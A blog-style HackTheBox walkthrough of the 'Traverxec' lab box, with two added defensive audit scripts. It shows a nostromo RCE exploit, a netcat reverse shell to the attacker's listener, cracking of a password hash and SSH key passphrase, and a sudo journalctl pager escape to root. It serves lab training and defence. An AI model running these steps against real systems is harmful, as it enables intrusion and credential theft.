HackTheBox - Traverxec


Traverxec was, in my opinion, a peculiar and interesting box. Although rated easy, it still taught me a little trick and got me very frustrated at some point, because it was super easy to overlook and overthink easy things. Still, it was worth cogitating on!

Tl;Dr: The user flag was accessible after using a Remote Code Execution exploit against the running nhttpd web server, which gave us access as the www-data user. From there you could enter the user's home directory and access a backup archive containing their SSH private key. After brute-forcing the passphrase you could connect to the user account and grab the flag.
The root flag consisted of exploiting a misconfiguration in the sudo config that allowed viewing journalctl entries as root without a password. Since journalctl uses less as a pager, it was possible to break out of less running as root by spawning an interactive system shell.

Alright! Let’s get into the details now!


First things first, let’s add the box IP to the hosts file:

[hg8@archbook ~]$ sudo sh -c 'echo "10.10.10.165 traverxec.htb" >> /etc/hosts'

and let’s start!

User Flag

Recon

Let’s start with the classic nmap scan to see which ports are open on the box:

[hg8@archbook ~]$ nmap -sV -sT -sC traverxec.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 15:36 CET
Nmap scan report for traverxec.htb (10.10.10.165)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nostromo 1.9.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have something super classic: HTTP (port 80) and SSH (port 22) services open.

But one thing in this result immediately catches the eye: nostromo 1.9.6. That’s a really uncommon web server.

According to its documentation:

nhttpd is a simple, fast and secure HTTP server. It runs as a single
process, handling connections with select(2).

And actually, while searching for information about this web server (out of curiosity), the second result on Google was about an RCE vulnerability through directory traversal in versions <= 1.9.6 (CVE-2019-16278).
A bash proof-of-concept is also available. Seems like we don’t need to search any further…

Let’s give it a try:

[hg8@archbook ~]$ git clone https://git.sp0re.sh/sp0re/Nhttpd-exploits.git
Cloning into 'Nhttpd-exploits'...
remote: Enumerating objects: 5, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 5 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (5/5), done.
[hg8@archbook ~]$ cd Nhttpd-exploits
[hg8@archbook ~]$ bash CVE-2019-16278.sh traverxec.htb 80 id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

That was fast!

Note: Be careful when launching the exploit: do not use CVE-2019-16279.sh, since it will DoS the box (CVE-2019-16279)… It was a very hard box to solve because it would constantly go down, probably because of people launching the wrong exploit by mistake.

Let’s now use it to open a reverse shell. First we start our listener:

[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585

And launch the exploit:

[hg8@archbook ~]$ bash CVE-2019-16278.sh traverxec.htb 80 "nc -e /bin/sh 10.10.10.10 8585"

We get the connection immediately:

[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585
Connection from 10.10.10.165:40048
www-data@traverxec:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

First things first, let’s see who the user is so we can locate the user.txt flag:

www-data@traverxec:/$ ls -la /home/
drwx--x--x 6 david david 4096 Nov 19 05:28 david
www-data@traverxec:/$ ls -la /home/david/
ls: cannot open directory '/home/david/': Permission denied

The user is david, but unfortunately we have no rights to read or write files in his home directory. Let’s move on, we might find additional information later.

Pivot www-data -> david

Looking around, we find the configuration of the nostromo web server. Hopefully we can find juicy information there?

www-data@traverxec:/$ cat /var/nostromo/conf/nhttpd.conf
# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin [email protected]
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
# LOGS [OPTIONAL]
logpid logs/nhttpd.pid
# SETUID [RECOMMENDED]
user www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www

The configuration gives the path to a .htpasswd file:

www-data@traverxec:/$ cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Maybe if we brute-force the password in this .htpasswd file we can reuse it to log in as david over SSH. Let’s give it a try:

[hg8@archbook ~]$ echo '$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/' > david.hash
[hg8@archbook ~]$ john --wordlist=~/SecLists/Passwords/Leaked-Databases/rockyou.txt david.hash
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Nowonly4me (?)
Session completed

Alright! We managed to get the password. That’s good news and a nice step. Let’s try to log in as david now:

[hg8@archbook ~]$ ssh [email protected]
[email protected]'s password:
Permission denied, please try again.

No luck… su - david maybe?

www-data@traverxec:/$ su - david
Password:
su: Authentication failure
www-data@traverxec:/$

Nope! Looks like a dead end here… Let’s go back to the beginning to make sure we didn’t miss anything.

First let’s check the nhttpd.conf file again:

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
[...]
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www

This HOMEDIRS option catches my eye. Does that mean we could access david’s home directory through the web server? Let’s check the documentation:

www-data@traverxec:/$ man nhttpd
HOMEDIRS
To serve the home directories of your users via HTTP, enable the homedirs option by defining the path in where the home directories are stored, normally /home. To access a users home directory enter a ~ in the URL followed by the home directory name like in this example:
http://www.nazgul.ch/~hacki/
The content of the home directory is handled exactly the same way as a directory in your document root. If some users don't want that their home directory can be accessed via HTTP, they shall remove the world readable flag on their home directory and a caller will receive a 403 Forbidden response. Also, if basic authentication is enabled, a user can create an .htaccess file in his home directory and a caller will need to authenticate.
You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option.

That’s interesting!
OK, so we know our user is david. Can we access his homedir?

[hg8@archbook ~]$ curl http://traverxec.htb/\~david/
<html>
<body><font style="sans-serif">
<h1>Private space.<br>Nothing here.
<br>Keep out!</h1>
</body>
</html>

“Nothing to see here”… That’s true, and running gobuster won’t help either. We need to find a way to list files and directories in david’s homedir, but how? And this is where I got frustrated… After searching for a while I realized I had overlooked something obvious. Let’s check the permissions of david’s homedir again:

www-data@traverxec:/$ ls -l /home/david/
ls: cannot open directory '/home/david': Permission denied
www-data@traverxec:/$ ls -l /home/
total 4
drwx--x--x 5 david david 4096 Dec 22 12:15 david

We indeed have neither read nor write permission, but the execute bit (x) is set.

For a binary, the x bit means the file can be executed. But what does it mean for a directory?

The execute bit (x) allows the affected user to enter the directory, and access files and directories inside.
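Seen from the defender's side, the same permission rule can be audited. The script below is an added example, not part of the original write-up: it lists every file under a published home sub-directory that any local account (the web server's included) can read once the home directory is searchable by "other". The sample tree and the names `alice` and `notes.txt` are constructed; run it as root or as the owner of the directories being checked.

```shell
#!/bin/sh
# Added example (not from the original post). All paths are constructed samples.

# True if "other" has the search (x) bit on directory $1.
world_can_traverse() {
    [ -n "$(find "$1" -prune -perm -001 -print)" ]
}

# Print every file under HOMES/<user>/PUBLIC that any local account can read:
# the home must be searchable by "other", each directory on the way down
# must be searchable by "other", and the file itself must be o+r.
exposed_files() {
    homes=$1
    public=$2
    for home in "$homes"/*/; do
        home=${home%/}
        [ -d "$home/$public" ] || continue
        world_can_traverse "$home" || continue
        find "$home/$public" -type d ! -perm -001 -prune \
            -o -type f -perm -004 -print
    done
}

# Build a constructed tree that mirrors the modes shown in the write-up.
make_sample() {
    root=$(mktemp -d)
    area=$root/david/public_www/protected-file-area
    mkdir -p "$area" "$root/alice/public_www"
    echo page   > "$root/david/public_www/index.html"
    echo backup > "$area/backup-ssh-identity-files.tgz"
    echo secret > "$root/david/public_www/notes.txt"
    echo page   > "$root/alice/public_www/index.html"
    chmod 755 "$root/david/public_www" "$area" "$root/alice/public_www"
    chmod 644 "$root/david/public_www/index.html" "$area"/*.tgz \
              "$root/alice/public_www/index.html"
    chmod 600 "$root/david/public_www/notes.txt"   # owner-only: not reported
    chmod 711 "$root/david"                        # drwx--x--x, as on the box
    chmod 700 "$root/alice"                        # drwx------: nothing exposed
    echo "$root"
}

sample=$(make_sample)
exposed_files "$sample" public_www
rm -rf "$sample"
```

Anything this prints for a real `/home` is readable without the owner's password, whatever `.htaccess` says over HTTP.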

So we can neither read nor write david’s homedir, but we can enter it! Let’s give it a try:

www-data@traverxec:/$ cd /home/david/public_www/
cd /home/david/public_www/
www-data@traverxec:/home/david/public_www$ ls -l
ls -l
total 8
-rw-r--r-- 1 david david 402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area

It worked! Once inside we notice another interesting folder: protected-file-area. Let’s see what it contains:

www-data@traverxec:/home/david/public_www/protected-file-area$ ls
backup-ssh-identity-files.tgz

A backup of SSH identity files? This sure looks promising. Let’s extract it:

www-data@traverxec:/home/david/public_www/protected-file-area$ mkdir /tmp/.tmp
www-data@traverxec:/home/david/public_www/protected-file-area$ tar -xzf backup-ssh-identity-files.tgz -C /tmp/.tmp
www-data@traverxec:/home/david/public_www/protected-file-area$ cd /tmp/.tmp/home/david/
www-data@traverxec:/tmp/.tmp/home/david$ ls -la .ssh/
-rw-r--r-- 1 www-data www-data 397 Oct 25 17:02 authorized_keys
-rw------- 1 www-data www-data 1766 Oct 25 17:02 id_rsa
-rw-r--r-- 1 www-data www-data 397 Oct 25 17:02 id_rsa.pub

Jackpot! We can now try to use this SSH key to access david’s account:

[hg8@archbook ~]$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':

It couldn’t have been this easy, right? A passphrase is needed for this SSH key. Let’s fire up john to see if we can brute-force the passphrase:

[hg8@archbook ~]$ ssh2john id_rsa > id_rsa.hash
[hg8@archbook ~]$ john --wordlist=~/SecLists/Passwords/Leaked-Databases/rockyou.txt id_rsa.hash
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (ssh/id_rsa)
Warning: Only 1 candidate left, minimum 2 needed for performance.
1g 0:00:00:12 DONE (2019-11-18 11:06) 0.08012g/s 1149Kp/s 1149Kc/s 1149KC/s *7¡Vamos!
Session completed

john found hunter as the passphrase. We have all the pieces to log in now:

[hg8@archbook ~]$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ cat user.txt
7xxxxxxxxxxxxxxxxxxxxxd

Root Flag

Recon

First things first, let’s check what’s inside david’s home directory:

david@traverxec:~$ ls -l
total 12
drwx------ 2 david david 4096 Dec 22 12:41 bin
drwxr-xr-x 3 david david 4096 Oct 25 15:45 public_www
-r--r----- 1 root david 33 Oct 25 16:14 user.txt
david@traverxec:~$ ls -l bin
total 8
-r-------- 1 david david 802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh

Let’s first focus on the bin folder and server-stats.sh script:

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The line about journalctl looks particularly interesting since it is run through sudo without a password. If we can abuse this journalctl command we can potentially escalate our privileges to root.

The best resource for finding examples of abusing legitimate binaries is GTFOBins:

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.

According to it, journalctl can be used to elevate privileges thanks to the pager used (less):

Less can be used to break out from restricted environments by spawning an interactive system shell.

Let’s give it a try:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-11-18 07:00:54 EST, end at Mon 2019-11-18
Nov 18 07:00:58 traverxec systemd[1]: Starting nostromo nhttpd serv
Nov 18 07:00:58 traverxec systemd[1]: nostromo.service: Can't open
Nov 18 07:00:58 traverxec nhttpd[477]: started
Nov 18 07:00:58 traverxec nhttpd[477]: max. file descriptors = 1040
Nov 18 07:00:58 traverxec systemd[1]: Started nostromo nhttpd serve
!/bin/sh
# bash
root@traverxec:/home/david/bin# cd
root@traverxec:~# ls
nostromo_1.9.6-1.deb root.txt
root@traverxec:~# cat root.txt
9xxxxxxxxxxxxxxxxx6

Now that we are root and done, let’s not forget to clean up our changes so we don’t spoil the box for other users!
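The pager escape described above can be caught before it is exploited by auditing sudoers. The script below is an added example, not part of the original write-up: it flags NOPASSWD rules whose command hands the terminal to a pager. The sudoers lines, user names and the short list of pager-capable binaries are constructed assumptions; the box's real sudoers file is not shown on this page.

```shell
#!/bin/sh
# Added example (not from the original post). The rules below are constructed.

# Print NOPASSWD sudoers commands that can hand control to a pager.
# journalctl and systemctl pass only if the rule pins --no-pager
# (sudo matches arguments listed in a rule exactly, so it cannot be dropped).
risky_sudo_rules() {
    awk '
    /^[ \t]*#/ || !/NOPASSWD:/ { next }
    {
        spec = $0
        sub(/.*NOPASSWD:[ \t]*/, "", spec)
        n = split(spec, cmds, /[ \t]*,[ \t]*/)
        for (i = 1; i <= n; i++) {
            split(cmds[i], words, /[ \t]+/)
            bin = words[1]
            sub(/.*\//, "", bin)
            if (bin ~ /^(less|more|man)$/)
                print "runs a pager as root: " cmds[i]
            else if (bin ~ /^(journalctl|systemctl)$/ && cmds[i] !~ /--no-pager/)
                print "pager not disabled: " cmds[i]
        }
    }' "$1"
}

# Constructed sudoers fragment (hypothetical users and rules).
make_sample_sudoers() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample, not taken from the box
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
ops   ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
backup ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/less /var/log/syslog
EOF
    echo "$f"
}

sample=$(make_sample_sudoers)
risky_sudo_rules "$sample"
rm -f "$sample"
```

The check only covers the simple one-line rule form; command aliases and tags such as NOEXEC are not parsed.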

Additional notes

I will put here some additional information about this box that could be useful to others.

.htpasswd brute-force

As you may have noticed in the user flag recon part, a .htpasswd file is available. It is used to restrict access to the protected-file-area folder in david’s homedir:

[Screenshot: basic auth traverxec]

It was possible to brute-force this .htpasswd file even though it was not needed to solve the box. Here is how to do it using good old john:

www-data@traverxec:/$ cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

[hg8@archbook ~]$ echo 'david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/' > david.hash
[hg8@archbook ~]$ john --wordlist=~/SecLists/Passwords/Leaked-Databases/rockyou.txt david.hash
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me (?)
1g 0:00:01:35 DONE (2019-11-17 19:28) 0.01052g/s 111325p/s 111325c/s 111325C/s Noyoo..NovemberRain
Session completed
[hg8@archbook ~]$ john --show david.hash
david:Nowonly4me

Let’s now try to access the protected-file-area using those credentials:

[Screenshot: david homedir htaccess]

Success!


That’s it folks! As always, do not hesitate to contact me with any questions or feedback!

See you next time ;)

-hg8


